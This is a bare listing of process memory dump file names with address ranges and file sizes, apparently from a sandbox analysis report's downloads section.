Download
memory/1992-34-0x00000000015C0000-0x000000000358D000-memory.dmp

Filesize
31.8MB

Download
memory/2432-31-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2432-27-0x00000000065D0000-0x000000000859D000-memory.dmp

Filesize
31.8MB

Download
memory/2432-17-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2432-18-0x00000000731B0000-0x000000007375B000-memory.dmp

Filesize
5.7MB

Download
memory/2432-19-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2432-39-0x00000000065D0000-0x000000000859D000-memory.dmp

Filesize
31.8MB

Download
memory/2432-33-0x00000000772B0000-0x0000000077386000-memory.dmp

Filesize
856KB

Download
memory/2432-22-0x0000000002B10000-0x0000000002B50000-memory.dmp

Filesize
256KB

Download
memory/2432-32-0x00000000770C0000-0x0000000077269000-memory.dmp

Filesize
1.7MB

Download
memory/2432-30-0x00000000731B0000-0x000000007375B000-memory.dmp

Filesize
5.7MB

Download
memory/2432-29-0x00000000065D0000-0x000000000859D000-memory.dmp

Filesize
31.8MB

Download
memory/2432-16-0x00000000731B0000-0x000000007375B000-memory.dmp

Filesize
5.7MB

Download
memory/2432-28-0x00000000054E0000-0x00000000054E1000-memory.dmp

Filesize
4KB

Download
memory/2800-10-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2800-26-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2800-24-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2800-4-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

Filesize
2.9MB

Download
memory/2800-23-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2800-21-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

Filesize
9.6MB

Download
memory/2800-25-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2800-11-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2800-6-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

Filesize
9.6MB

Download
memory/2800-7-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2800-9-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2800-8-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

Filesize
9.6MB

Download
memory/2800-5-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2800-44-0x000007FEF5630000-0x000007FEF5FCD000-memory.dmp

Filesize
9.6MB

Download